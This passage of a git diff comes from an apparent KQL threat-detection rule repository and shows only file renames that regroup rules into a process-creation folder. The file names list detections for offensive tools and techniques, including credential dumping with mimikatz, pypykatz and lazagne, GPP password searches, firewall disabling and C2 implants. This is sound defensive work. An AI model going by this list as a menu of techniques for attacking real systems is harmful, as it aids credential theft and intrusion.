FolderPath endswith "\\vivaldi.exe") \ No newline at end of file diff --git a/KQL/rules/Command and Control/file_download_from_ip_based_url_via_certoc_exe.kql b/KQL/rules/windows/process_creation/file_download_from_ip_based_url_via_certoc_exe.kql similarity index 100% rename from KQL/rules/Command and Control/file_download_from_ip_based_url_via_certoc_exe.kql rename to KQL/rules/windows/process_creation/file_download_from_ip_based_url_via_certoc_exe.kql diff --git a/KQL/rules/Execution/file_download_from_ip_url_via_curl_exe.kql b/KQL/rules/windows/process_creation/file_download_from_ip_url_via_curl_exe.kql similarity index 100% rename from KQL/rules/Execution/file_download_from_ip_url_via_curl_exe.kql rename to KQL/rules/windows/process_creation/file_download_from_ip_url_via_curl_exe.kql diff --git a/KQL/rules/Command and Control/file_download_using_notepad_gup_utility.kql b/KQL/rules/windows/process_creation/file_download_using_notepad_gup_utility.kql similarity index 100% rename from KQL/rules/Command and Control/file_download_using_notepad_gup_utility.kql rename to KQL/rules/windows/process_creation/file_download_using_notepad_gup_utility.kql diff --git a/KQL/rules/Defense Evasion/file_download_using_protocolhandler_exe.kql b/KQL/rules/windows/process_creation/file_download_using_protocolhandler_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/file_download_using_protocolhandler_exe.kql rename to KQL/rules/windows/process_creation/file_download_using_protocolhandler_exe.kql diff --git a/KQL/rules/Defense Evasion/file_download_via_bitsadmin.kql b/KQL/rules/windows/process_creation/file_download_via_bitsadmin.kql similarity index 100% rename from KQL/rules/Defense Evasion/file_download_via_bitsadmin.kql rename to KQL/rules/windows/process_creation/file_download_via_bitsadmin.kql diff --git a/KQL/rules/Defense Evasion/file_download_via_bitsadmin_to_a_suspicious_target_folder.kql b/KQL/rules/windows/process_creation/file_download_via_bitsadmin_to_a_suspicious_target_folder.kql similarity index 100% rename from KQL/rules/Defense Evasion/file_download_via_bitsadmin_to_a_suspicious_target_folder.kql rename to KQL/rules/windows/process_creation/file_download_via_bitsadmin_to_a_suspicious_target_folder.kql diff --git a/KQL/rules/Defense Evasion/file_download_via_bitsadmin_to_an_uncommon_target_folder.kql b/KQL/rules/windows/process_creation/file_download_via_bitsadmin_to_an_uncommon_target_folder.kql similarity index 100% rename from KQL/rules/Defense Evasion/file_download_via_bitsadmin_to_an_uncommon_target_folder.kql rename to KQL/rules/windows/process_creation/file_download_via_bitsadmin_to_an_uncommon_target_folder.kql diff --git a/KQL/rules/Command and Control/file_download_via_certoc_exe.kql b/KQL/rules/windows/process_creation/file_download_via_certoc_exe.kql similarity index 100% rename from KQL/rules/Command and Control/file_download_via_certoc_exe.kql rename to KQL/rules/windows/process_creation/file_download_via_certoc_exe.kql diff --git a/KQL/rules/Defense Evasion/file_download_via_installutil_exe.kql b/KQL/rules/windows/process_creation/file_download_via_installutil_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/file_download_via_installutil_exe.kql rename to KQL/rules/windows/process_creation/file_download_via_installutil_exe.kql diff --git a/KQL/rules/Defense Evasion/file_download_via_windows_defender_mpcmprun_exe.kql b/KQL/rules/windows/process_creation/file_download_via_windows_defender_mpcmprun_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/file_download_via_windows_defender_mpcmprun_exe.kql rename to KQL/rules/windows/process_creation/file_download_via_windows_defender_mpcmprun_exe.kql diff --git a/KQL/rules/Defense Evasion/file_download_with_headless_browser.kql b/KQL/rules/windows/process_creation/file_download_with_headless_browser.kql similarity index 100% rename from KQL/rules/Defense Evasion/file_download_with_headless_browser.kql rename to KQL/rules/windows/process_creation/file_download_with_headless_browser.kql diff --git a/KQL/rules/Defense Evasion/file_encoded_to_base64_via_certutil_exe.kql b/KQL/rules/windows/process_creation/file_encoded_to_base64_via_certutil_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/file_encoded_to_base64_via_certutil_exe.kql rename to KQL/rules/windows/process_creation/file_encoded_to_base64_via_certutil_exe.kql diff --git a/KQL/rules/Execution/file_encryption_decryption_via_gpg4win_from_suspicious_locations.kql b/KQL/rules/windows/process_creation/file_encryption_decryption_via_gpg4win_from_suspicious_locations.kql similarity index 100% rename from KQL/rules/Execution/file_encryption_decryption_via_gpg4win_from_suspicious_locations.kql rename to KQL/rules/windows/process_creation/file_encryption_decryption_via_gpg4win_from_suspicious_locations.kql diff --git a/KQL/rules/Execution/file_encryption_using_gpg4win.kql b/KQL/rules/windows/process_creation/file_encryption_using_gpg4win.kql similarity index 100% rename from KQL/rules/Execution/file_encryption_using_gpg4win.kql rename to KQL/rules/windows/process_creation/file_encryption_using_gpg4win.kql diff --git a/KQL/rules/Discovery/file_explorer_folder_opened_using_explorer_folder_shortcut_via_shell.kql b/KQL/rules/windows/process_creation/file_explorer_folder_opened_using_explorer_folder_shortcut_via_shell.kql similarity index 100% rename from KQL/rules/Discovery/file_explorer_folder_opened_using_explorer_folder_shortcut_via_shell.kql rename to KQL/rules/windows/process_creation/file_explorer_folder_opened_using_explorer_folder_shortcut_via_shell.kql diff --git a/KQL/rules/Defense Evasion/file_in_suspicious_location_encoded_to_base64_via_certutil_exe.kql b/KQL/rules/windows/process_creation/file_in_suspicious_location_encoded_to_base64_via_certutil_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/file_in_suspicious_location_encoded_to_base64_via_certutil_exe.kql rename to KQL/rules/windows/process_creation/file_in_suspicious_location_encoded_to_base64_via_certutil_exe.kql diff --git a/KQL/rules/Impact/file_recovery_from_backup_via_wbadmin_exe.kql b/KQL/rules/windows/process_creation/file_recovery_from_backup_via_wbadmin_exe.kql similarity index 100% rename from KQL/rules/Impact/file_recovery_from_backup_via_wbadmin_exe.kql rename to KQL/rules/windows/process_creation/file_recovery_from_backup_via_wbadmin_exe.kql diff --git a/KQL/rules/Defense Evasion/file_with_suspicious_extension_downloaded_via_bitsadmin.kql b/KQL/rules/windows/process_creation/file_with_suspicious_extension_downloaded_via_bitsadmin.kql similarity index 100% rename from KQL/rules/Defense Evasion/file_with_suspicious_extension_downloaded_via_bitsadmin.kql rename to KQL/rules/windows/process_creation/file_with_suspicious_extension_downloaded_via_bitsadmin.kql diff --git a/KQL/rules/Collection/files_added_to_an_archive_using_rar_exe.kql b/KQL/rules/windows/process_creation/files_added_to_an_archive_using_rar_exe.kql similarity index 100% rename from KQL/rules/Collection/files_added_to_an_archive_using_rar_exe.kql rename to KQL/rules/windows/process_creation/files_added_to_an_archive_using_rar_exe.kql diff --git a/KQL/rules/Defense Evasion/filter_driver_unloaded_via_fltmc_exe.kql b/KQL/rules/windows/process_creation/filter_driver_unloaded_via_fltmc_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/filter_driver_unloaded_via_fltmc_exe.kql rename to KQL/rules/windows/process_creation/filter_driver_unloaded_via_fltmc_exe.kql diff --git a/KQL/rules/Credential Access/findstr_gpp_passwords.kql b/KQL/rules/windows/process_creation/findstr_gpp_passwords.kql similarity index 100% rename from KQL/rules/Credential Access/findstr_gpp_passwords.kql rename to KQL/rules/windows/process_creation/findstr_gpp_passwords.kql diff --git a/KQL/rules/Defense Evasion/findstr_launching_lnk_file.kql b/KQL/rules/windows/process_creation/findstr_launching_lnk_file.kql similarity index 100% rename from KQL/rules/Defense Evasion/findstr_launching_lnk_file.kql rename to KQL/rules/windows/process_creation/findstr_launching_lnk_file.kql diff --git a/KQL/rules/Command and Control/finger_exe_execution.kql b/KQL/rules/windows/process_creation/finger_exe_execution.kql similarity index 100% rename from KQL/rules/Command and Control/finger_exe_execution.kql rename to KQL/rules/windows/process_creation/finger_exe_execution.kql diff --git a/KQL/rules/Discovery/firewall_configuration_discovery_via_netsh_exe.kql b/KQL/rules/windows/process_creation/firewall_configuration_discovery_via_netsh_exe.kql similarity index 100% rename from KQL/rules/Discovery/firewall_configuration_discovery_via_netsh_exe.kql rename to KQL/rules/windows/process_creation/firewall_configuration_discovery_via_netsh_exe.kql diff --git a/KQL/rules/Defense Evasion/firewall_disabled_via_netsh_exe.kql b/KQL/rules/windows/process_creation/firewall_disabled_via_netsh_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/firewall_disabled_via_netsh_exe.kql rename to KQL/rules/windows/process_creation/firewall_disabled_via_netsh_exe.kql diff --git a/KQL/rules/Defense Evasion/firewall_rule_deleted_via_netsh_exe.kql b/KQL/rules/windows/process_creation/firewall_rule_deleted_via_netsh_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/firewall_rule_deleted_via_netsh_exe.kql rename to KQL/rules/windows/process_creation/firewall_rule_deleted_via_netsh_exe.kql diff --git a/KQL/rules/Defense Evasion/firewall_rule_update_via_netsh_exe.kql b/KQL/rules/windows/process_creation/firewall_rule_update_via_netsh_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/firewall_rule_update_via_netsh_exe.kql rename to KQL/rules/windows/process_creation/firewall_rule_update_via_netsh_exe.kql diff --git a/KQL/rules/Collection/folder_compress_to_potentially_suspicious_output_via_compress_archive_cmdlet.kql b/KQL/rules/windows/process_creation/folder_compress_to_potentially_suspicious_output_via_compress_archive_cmdlet.kql similarity index 100% rename from KQL/rules/Collection/folder_compress_to_potentially_suspicious_output_via_compress_archive_cmdlet.kql rename to KQL/rules/windows/process_creation/folder_compress_to_potentially_suspicious_output_via_compress_archive_cmdlet.kql diff --git a/KQL/rules/Execution/forfiles_command_execution.kql b/KQL/rules/windows/process_creation/forfiles_command_execution.kql similarity index 100% rename from KQL/rules/Execution/forfiles_command_execution.kql rename to KQL/rules/windows/process_creation/forfiles_command_execution.kql diff --git a/KQL/rules/Defense Evasion/forfiles_exe_child_process_masquerading.kql b/KQL/rules/windows/process_creation/forfiles_exe_child_process_masquerading.kql similarity index 100% rename from KQL/rules/Defense Evasion/forfiles_exe_child_process_masquerading.kql rename to KQL/rules/windows/process_creation/forfiles_exe_child_process_masquerading.kql diff --git a/KQL/rules/Discovery/fsutil_drive_enumeration.kql b/KQL/rules/windows/process_creation/fsutil_drive_enumeration.kql similarity index 100% rename from KQL/rules/Discovery/fsutil_drive_enumeration.kql rename to KQL/rules/windows/process_creation/fsutil_drive_enumeration.kql diff --git a/KQL/rules/Defense Evasion/fsutil_suspicious_invocation.kql b/KQL/rules/windows/process_creation/fsutil_suspicious_invocation.kql similarity index 100% rename from KQL/rules/Defense Evasion/fsutil_suspicious_invocation.kql rename to KQL/rules/windows/process_creation/fsutil_suspicious_invocation.kql diff --git a/KQL/rules/Discovery/gpresult_display_group_policy_information.kql b/KQL/rules/windows/process_creation/gpresult_display_group_policy_information.kql similarity index 100% rename from KQL/rules/Discovery/gpresult_display_group_policy_information.kql rename to KQL/rules/windows/process_creation/gpresult_display_group_policy_information.kql diff --git a/KQL/rules/Defense Evasion/gpscript_execution.kql b/KQL/rules/windows/process_creation/gpscript_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/gpscript_execution.kql rename to KQL/rules/windows/process_creation/gpscript_execution.kql diff --git a/KQL/rules/Defense Evasion/greedy_file_deletion_using_del.kql b/KQL/rules/windows/process_creation/greedy_file_deletion_using_del.kql similarity index 100% rename from KQL/rules/Defense Evasion/greedy_file_deletion_using_del.kql rename to KQL/rules/windows/process_creation/greedy_file_deletion_using_del.kql diff --git a/KQL/rules/Discovery/group_membership_reconnaissance_via_whoami_exe.kql b/KQL/rules/windows/process_creation/group_membership_reconnaissance_via_whoami_exe.kql similarity index 100% rename from KQL/rules/Discovery/group_membership_reconnaissance_via_whoami_exe.kql rename to KQL/rules/windows/process_creation/group_membership_reconnaissance_via_whoami_exe.kql diff --git a/KQL/rules/Command and Control/gzip_archive_decode_via_powershell.kql b/KQL/rules/windows/process_creation/gzip_archive_decode_via_powershell.kql similarity index 100% rename from KQL/rules/Command and Control/gzip_archive_decode_via_powershell.kql rename to KQL/rules/windows/process_creation/gzip_archive_decode_via_powershell.kql diff --git a/KQL/rules/Collection/hacktool_adcspwn_execution.kql b/KQL/rules/windows/process_creation/hacktool_adcspwn_execution.kql similarity index 100% rename from KQL/rules/Collection/hacktool_adcspwn_execution.kql rename to KQL/rules/windows/process_creation/hacktool_adcspwn_execution.kql diff --git a/KQL/rules/Discovery/hacktool_bloodhound_sharphound_execution.kql b/KQL/rules/windows/process_creation/hacktool_bloodhound_sharphound_execution.kql similarity index 100% rename from KQL/rules/Discovery/hacktool_bloodhound_sharphound_execution.kql rename to KQL/rules/windows/process_creation/hacktool_bloodhound_sharphound_execution.kql diff --git a/KQL/rules/Discovery/hacktool_certify_execution.kql b/KQL/rules/windows/process_creation/hacktool_certify_execution.kql similarity index 100% rename from KQL/rules/Discovery/hacktool_certify_execution.kql rename to KQL/rules/windows/process_creation/hacktool_certify_execution.kql diff --git a/KQL/rules/Discovery/hacktool_certipy_execution.kql b/KQL/rules/windows/process_creation/hacktool_certipy_execution.kql similarity index 100% rename from KQL/rules/Discovery/hacktool_certipy_execution.kql rename to KQL/rules/windows/process_creation/hacktool_certipy_execution.kql diff --git a/KQL/rules/Execution/hacktool_covenant_powershell_launcher.kql b/KQL/rules/windows/process_creation/hacktool_covenant_powershell_launcher.kql similarity index 100% rename from KQL/rules/Execution/hacktool_covenant_powershell_launcher.kql rename to KQL/rules/windows/process_creation/hacktool_covenant_powershell_launcher.kql diff --git a/KQL/rules/Execution/hacktool_crackmapexec_execution.kql b/KQL/rules/windows/process_creation/hacktool_crackmapexec_execution.kql similarity index 100% rename from KQL/rules/Execution/hacktool_crackmapexec_execution.kql rename to KQL/rules/windows/process_creation/hacktool_crackmapexec_execution.kql diff --git a/KQL/rules/Privilege Escalation/hacktool_crackmapexec_execution_patterns.kql b/KQL/rules/windows/process_creation/hacktool_crackmapexec_execution_patterns.kql similarity index 100% rename from KQL/rules/Privilege Escalation/hacktool_crackmapexec_execution_patterns.kql rename to KQL/rules/windows/process_creation/hacktool_crackmapexec_execution_patterns.kql diff --git a/KQL/rules/Execution/hacktool_crackmapexec_powershell_obfuscation.kql b/KQL/rules/windows/process_creation/hacktool_crackmapexec_powershell_obfuscation.kql similarity index 100% rename from KQL/rules/Execution/hacktool_crackmapexec_powershell_obfuscation.kql rename to KQL/rules/windows/process_creation/hacktool_crackmapexec_powershell_obfuscation.kql diff --git a/KQL/rules/Credential Access/hacktool_crackmapexec_process_patterns.kql b/KQL/rules/windows/process_creation/hacktool_crackmapexec_process_patterns.kql similarity index 100% rename from KQL/rules/Credential Access/hacktool_crackmapexec_process_patterns.kql rename to KQL/rules/windows/process_creation/hacktool_crackmapexec_process_patterns.kql diff --git a/KQL/rules/Execution/hacktool_default_powersploit_empire_scheduled_task_creation.kql b/KQL/rules/windows/process_creation/hacktool_default_powersploit_empire_scheduled_task_creation.kql similarity index 100% rename from KQL/rules/Execution/hacktool_default_powersploit_empire_scheduled_task_creation.kql rename to KQL/rules/windows/process_creation/hacktool_default_powersploit_empire_scheduled_task_creation.kql diff --git a/KQL/rules/Privilege Escalation/hacktool_dinjector_powershell_cradle_execution.kql b/KQL/rules/windows/process_creation/hacktool_dinjector_powershell_cradle_execution.kql similarity index 100% rename from KQL/rules/Privilege Escalation/hacktool_dinjector_powershell_cradle_execution.kql rename to KQL/rules/windows/process_creation/hacktool_dinjector_powershell_cradle_execution.kql diff --git a/KQL/rules/Credential Access/hacktool_dumpert_process_dumper_execution.kql b/KQL/rules/windows/process_creation/hacktool_dumpert_process_dumper_execution.kql similarity index 100% rename from KQL/rules/Credential Access/hacktool_dumpert_process_dumper_execution.kql rename to KQL/rules/windows/process_creation/hacktool_dumpert_process_dumper_execution.kql diff --git a/KQL/rules/Defense Evasion/hacktool_edrsilencer_execution.kql b/KQL/rules/windows/process_creation/hacktool_edrsilencer_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/hacktool_edrsilencer_execution.kql rename to KQL/rules/windows/process_creation/hacktool_edrsilencer_execution.kql diff --git a/KQL/rules/Execution/hacktool_empire_powershell_launch_parameters.kql b/KQL/rules/windows/process_creation/hacktool_empire_powershell_launch_parameters.kql similarity index 100% rename from KQL/rules/Execution/hacktool_empire_powershell_launch_parameters.kql rename to KQL/rules/windows/process_creation/hacktool_empire_powershell_launch_parameters.kql diff --git a/KQL/rules/Defense Evasion/hacktool_empire_powershell_uac_bypass.kql b/KQL/rules/windows/process_creation/hacktool_empire_powershell_uac_bypass.kql similarity index 100% rename from KQL/rules/Defense Evasion/hacktool_empire_powershell_uac_bypass.kql rename to KQL/rules/windows/process_creation/hacktool_empire_powershell_uac_bypass.kql diff --git a/KQL/rules/Credential Access/hacktool_execution_pe_metadata.kql b/KQL/rules/windows/process_creation/hacktool_execution_pe_metadata.kql similarity index 100% rename from KQL/rules/Credential Access/hacktool_execution_pe_metadata.kql rename to KQL/rules/windows/process_creation/hacktool_execution_pe_metadata.kql diff --git a/KQL/rules/Defense Evasion/hacktool_f_secure_c3_load_by_rundll32.kql b/KQL/rules/windows/process_creation/hacktool_f_secure_c3_load_by_rundll32.kql similarity index 100% rename from KQL/rules/Defense Evasion/hacktool_f_secure_c3_load_by_rundll32.kql rename to KQL/rules/windows/process_creation/hacktool_f_secure_c3_load_by_rundll32.kql diff --git a/KQL/rules/Defense Evasion/hacktool_gmer_rootkit_detector_and_remover_execution.kql b/KQL/rules/windows/process_creation/hacktool_gmer_rootkit_detector_and_remover_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/hacktool_gmer_rootkit_detector_and_remover_execution.kql rename to KQL/rules/windows/process_creation/hacktool_gmer_rootkit_detector_and_remover_execution.kql diff --git a/KQL/rules/Credential Access/hacktool_hashcat_password_cracker_execution.kql b/KQL/rules/windows/process_creation/hacktool_hashcat_password_cracker_execution.kql similarity index 100% rename from KQL/rules/Credential Access/hacktool_hashcat_password_cracker_execution.kql rename to KQL/rules/windows/process_creation/hacktool_hashcat_password_cracker_execution.kql diff --git a/KQL/rules/Privilege Escalation/hacktool_hollowreaper_execution.kql b/KQL/rules/windows/process_creation/hacktool_hollowreaper_execution.kql similarity index 100% rename from KQL/rules/Privilege Escalation/hacktool_hollowreaper_execution.kql rename to KQL/rules/windows/process_creation/hacktool_hollowreaper_execution.kql diff --git a/KQL/rules/Command and Control/hacktool_htran_natbypass_execution.kql b/KQL/rules/windows/process_creation/hacktool_htran_natbypass_execution.kql similarity index 100% rename from KQL/rules/Command and Control/hacktool_htran_natbypass_execution.kql rename to KQL/rules/windows/process_creation/hacktool_htran_natbypass_execution.kql diff --git a/KQL/rules/Credential Access/hacktool_hydra_password_bruteforce_execution.kql b/KQL/rules/windows/process_creation/hacktool_hydra_password_bruteforce_execution.kql similarity index 100% rename from KQL/rules/Credential Access/hacktool_hydra_password_bruteforce_execution.kql rename to KQL/rules/windows/process_creation/hacktool_hydra_password_bruteforce_execution.kql diff --git a/KQL/rules/Collection/hacktool_impacket_tools_execution.kql b/KQL/rules/windows/process_creation/hacktool_impacket_tools_execution.kql similarity index 100% rename from KQL/rules/Collection/hacktool_impacket_tools_execution.kql rename to KQL/rules/windows/process_creation/hacktool_impacket_tools_execution.kql diff --git a/KQL/rules/Privilege Escalation/hacktool_impersonate_execution.kql b/KQL/rules/windows/process_creation/hacktool_impersonate_execution.kql similarity index 100% rename from KQL/rules/Privilege Escalation/hacktool_impersonate_execution.kql rename to KQL/rules/windows/process_creation/hacktool_impersonate_execution.kql diff --git a/KQL/rules/Credential Access/hacktool_inveigh_execution.kql b/KQL/rules/windows/process_creation/hacktool_inveigh_execution.kql similarity index 100% rename from KQL/rules/Credential Access/hacktool_inveigh_execution.kql rename to KQL/rules/windows/process_creation/hacktool_inveigh_execution.kql diff --git a/KQL/rules/Execution/hacktool_jlaive_in_memory_assembly_execution.kql b/KQL/rules/windows/process_creation/hacktool_jlaive_in_memory_assembly_execution.kql similarity index 100% rename from KQL/rules/Execution/hacktool_jlaive_in_memory_assembly_execution.kql rename to KQL/rules/windows/process_creation/hacktool_jlaive_in_memory_assembly_execution.kql diff --git a/KQL/rules/Execution/hacktool_koadic_execution.kql b/KQL/rules/windows/process_creation/hacktool_koadic_execution.kql similarity index 100% rename from KQL/rules/Execution/hacktool_koadic_execution.kql rename to KQL/rules/windows/process_creation/hacktool_koadic_execution.kql diff --git a/KQL/rules/Credential Access/hacktool_krbrelay_execution.kql b/KQL/rules/windows/process_creation/hacktool_krbrelay_execution.kql similarity index 100% rename from KQL/rules/Credential Access/hacktool_krbrelay_execution.kql rename to KQL/rules/windows/process_creation/hacktool_krbrelay_execution.kql diff --git a/KQL/rules/Defense Evasion/hacktool_krbrelayup_execution.kql b/KQL/rules/windows/process_creation/hacktool_krbrelayup_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/hacktool_krbrelayup_execution.kql rename to KQL/rules/windows/process_creation/hacktool_krbrelayup_execution.kql diff --git a/KQL/rules/Credential Access/hacktool_lazagne_execution.kql b/KQL/rules/windows/process_creation/hacktool_lazagne_execution.kql similarity index 100% rename from KQL/rules/Credential Access/hacktool_lazagne_execution.kql rename to KQL/rules/windows/process_creation/hacktool_lazagne_execution.kql diff --git a/KQL/rules/Credential Access/hacktool_mimikatz_execution.kql b/KQL/rules/windows/process_creation/hacktool_mimikatz_execution.kql similarity index 100% rename from KQL/rules/Credential Access/hacktool_mimikatz_execution.kql rename to KQL/rules/windows/process_creation/hacktool_mimikatz_execution.kql diff --git a/KQL/rules/Execution/hacktool_pchunter_execution.kql b/KQL/rules/windows/process_creation/hacktool_pchunter_execution.kql similarity index 100% rename from KQL/rules/Execution/hacktool_pchunter_execution.kql rename to KQL/rules/windows/process_creation/hacktool_pchunter_execution.kql diff --git a/KQL/rules/Execution/hacktool_potential_impacket_lateral_movement_activity.kql b/KQL/rules/windows/process_creation/hacktool_potential_impacket_lateral_movement_activity.kql similarity index 100% rename from KQL/rules/Execution/hacktool_potential_impacket_lateral_movement_activity.kql rename to KQL/rules/windows/process_creation/hacktool_potential_impacket_lateral_movement_activity.kql diff --git a/KQL/rules/Defense Evasion/hacktool_powertool_execution.kql b/KQL/rules/windows/process_creation/hacktool_powertool_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/hacktool_powertool_execution.kql rename to KQL/rules/windows/process_creation/hacktool_powertool_execution.kql diff --git a/KQL/rules/Resource Development/hacktool_purplesharp_execution.kql b/KQL/rules/windows/process_creation/hacktool_purplesharp_execution.kql similarity index 100% rename from KQL/rules/Resource Development/hacktool_purplesharp_execution.kql rename to KQL/rules/windows/process_creation/hacktool_purplesharp_execution.kql diff --git a/KQL/rules/Credential Access/hacktool_pypykatz_credentials_dumping_activity.kql b/KQL/rules/windows/process_creation/hacktool_pypykatz_credentials_dumping_activity.kql similarity index 100% rename from KQL/rules/Credential Access/hacktool_pypykatz_credentials_dumping_activity.kql rename to KQL/rules/windows/process_creation/hacktool_pypykatz_credentials_dumping_activity.kql diff --git a/KQL/rules/Credential Access/hacktool_quarks_pwdump_execution.kql b/KQL/rules/windows/process_creation/hacktool_quarks_pwdump_execution.kql similarity index 100% rename from KQL/rules/Credential Access/hacktool_quarks_pwdump_execution.kql rename to KQL/rules/windows/process_creation/hacktool_quarks_pwdump_execution.kql diff --git a/KQL/rules/Execution/hacktool_redmimicry_winnti_playbook_execution.kql b/KQL/rules/windows/process_creation/hacktool_redmimicry_winnti_playbook_execution.kql similarity index 100% rename from KQL/rules/Execution/hacktool_redmimicry_winnti_playbook_execution.kql rename to KQL/rules/windows/process_creation/hacktool_redmimicry_winnti_playbook_execution.kql diff --git a/KQL/rules/Credential Access/hacktool_remotekrbrelay_execution.kql b/KQL/rules/windows/process_creation/hacktool_remotekrbrelay_execution.kql similarity index 100% rename from KQL/rules/Credential Access/hacktool_remotekrbrelay_execution.kql rename to KQL/rules/windows/process_creation/hacktool_remotekrbrelay_execution.kql diff --git a/KQL/rules/Defense Evasion/hacktool_rubeus_execution.kql b/KQL/rules/windows/process_creation/hacktool_rubeus_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/hacktool_rubeus_execution.kql rename to KQL/rules/windows/process_creation/hacktool_rubeus_execution.kql diff --git a/KQL/rules/Credential Access/hacktool_safetykatz_execution.kql b/KQL/rules/windows/process_creation/hacktool_safetykatz_execution.kql similarity index 100% rename from KQL/rules/Credential Access/hacktool_safetykatz_execution.kql rename to KQL/rules/windows/process_creation/hacktool_safetykatz_execution.kql diff --git a/KQL/rules/Credential Access/hacktool_securityxploded_execution.kql b/KQL/rules/windows/process_creation/hacktool_securityxploded_execution.kql similarity index 100% rename from KQL/rules/Credential Access/hacktool_securityxploded_execution.kql rename to KQL/rules/windows/process_creation/hacktool_securityxploded_execution.kql diff --git a/KQL/rules/Command and Control/hacktool_sharpchisel_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpchisel_execution.kql similarity index 100% rename from KQL/rules/Command and Control/hacktool_sharpchisel_execution.kql rename to KQL/rules/windows/process_creation/hacktool_sharpchisel_execution.kql diff --git a/KQL/rules/Privilege Escalation/hacktool_sharpdpapi_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpdpapi_execution.kql similarity index 100% rename from KQL/rules/Privilege Escalation/hacktool_sharpdpapi_execution.kql rename to KQL/rules/windows/process_creation/hacktool_sharpdpapi_execution.kql diff --git a/KQL/rules/Privilege Escalation/hacktool_sharpersist_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpersist_execution.kql similarity index 100% rename from KQL/rules/Privilege Escalation/hacktool_sharpersist_execution.kql rename to KQL/rules/windows/process_creation/hacktool_sharpersist_execution.kql diff --git a/KQL/rules/Defense Evasion/hacktool_sharpevtmute_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpevtmute_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/hacktool_sharpevtmute_execution.kql rename to KQL/rules/windows/process_creation/hacktool_sharpevtmute_execution.kql diff --git a/KQL/rules/Privilege Escalation/hacktool_sharpimpersonation_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpimpersonation_execution.kql similarity index 100% rename from KQL/rules/Privilege Escalation/hacktool_sharpimpersonation_execution.kql rename to KQL/rules/windows/process_creation/hacktool_sharpimpersonation_execution.kql diff --git a/KQL/rules/Discovery/hacktool_sharpldapmonitor_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpldapmonitor_execution.kql similarity index 100% rename from KQL/rules/Discovery/hacktool_sharpldapmonitor_execution.kql rename to KQL/rules/windows/process_creation/hacktool_sharpldapmonitor_execution.kql diff --git a/KQL/rules/Discovery/hacktool_sharpldapwhoami_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpldapwhoami_execution.kql similarity index 100% rename from KQL/rules/Discovery/hacktool_sharpldapwhoami_execution.kql rename to KQL/rules/windows/process_creation/hacktool_sharpldapwhoami_execution.kql diff --git a/KQL/rules/Lateral Movement/hacktool_sharpmove_tool_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpmove_tool_execution.kql similarity index 100% rename from KQL/rules/Lateral Movement/hacktool_sharpmove_tool_execution.kql rename to KQL/rules/windows/process_creation/hacktool_sharpmove_tool_execution.kql diff --git a/KQL/rules/Persistence/hacktool_sharpup_privesc_tool_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpup_privesc_tool_execution.kql similarity index 100% rename from KQL/rules/Persistence/hacktool_sharpup_privesc_tool_execution.kql rename to KQL/rules/windows/process_creation/hacktool_sharpup_privesc_tool_execution.kql diff --git a/KQL/rules/Discovery/hacktool_sharpview_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpview_execution.kql similarity index 100% rename from KQL/rules/Discovery/hacktool_sharpview_execution.kql rename to KQL/rules/windows/process_creation/hacktool_sharpview_execution.kql diff --git a/KQL/rules/Execution/hacktool_sharpwsus_wsuspendu_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpwsus_wsuspendu_execution.kql similarity index 100% rename from KQL/rules/Execution/hacktool_sharpwsus_wsuspendu_execution.kql rename to KQL/rules/windows/process_creation/hacktool_sharpwsus_wsuspendu_execution.kql diff --git a/KQL/rules/Command and Control/hacktool_silenttrinity_stager_execution.kql b/KQL/rules/windows/process_creation/hacktool_silenttrinity_stager_execution.kql similarity index 100% rename from KQL/rules/Command and Control/hacktool_silenttrinity_stager_execution.kql rename to KQL/rules/windows/process_creation/hacktool_silenttrinity_stager_execution.kql diff --git a/KQL/rules/Execution/hacktool_sliver_c2_implant_activity_pattern.kql b/KQL/rules/windows/process_creation/hacktool_sliver_c2_implant_activity_pattern.kql similarity index 100% rename from KQL/rules/Execution/hacktool_sliver_c2_implant_activity_pattern.kql rename to KQL/rules/windows/process_creation/hacktool_sliver_c2_implant_activity_pattern.kql diff --git a/KQL/rules/Discovery/hacktool_soaphound_execution.kql b/KQL/rules/windows/process_creation/hacktool_soaphound_execution.kql similarity index 100% rename from KQL/rules/Discovery/hacktool_soaphound_execution.kql rename to KQL/rules/windows/process_creation/hacktool_soaphound_execution.kql diff --git a/KQL/rules/Execution/hacktool_stracciatella_execution.kql b/KQL/rules/windows/process_creation/hacktool_stracciatella_execution.kql similarity index 100% rename from KQL/rules/Execution/hacktool_stracciatella_execution.kql rename to KQL/rules/windows/process_creation/hacktool_stracciatella_execution.kql diff --git a/KQL/rules/Discovery/hacktool_trufflesnout_execution.kql b/KQL/rules/windows/process_creation/hacktool_trufflesnout_execution.kql similarity index 100% rename from KQL/rules/Discovery/hacktool_trufflesnout_execution.kql rename to KQL/rules/windows/process_creation/hacktool_trufflesnout_execution.kql diff --git a/KQL/rules/Privilege Escalation/hacktool_winpeas_execution.kql b/KQL/rules/windows/process_creation/hacktool_winpeas_execution.kql similarity index 100% rename from KQL/rules/Privilege Escalation/hacktool_winpeas_execution.kql rename to KQL/rules/windows/process_creation/hacktool_winpeas_execution.kql diff --git a/KQL/rules/Credential Access/hacktool_winpwn_execution.kql b/KQL/rules/windows/process_creation/hacktool_winpwn_execution.kql similarity index 100% rename from KQL/rules/Credential 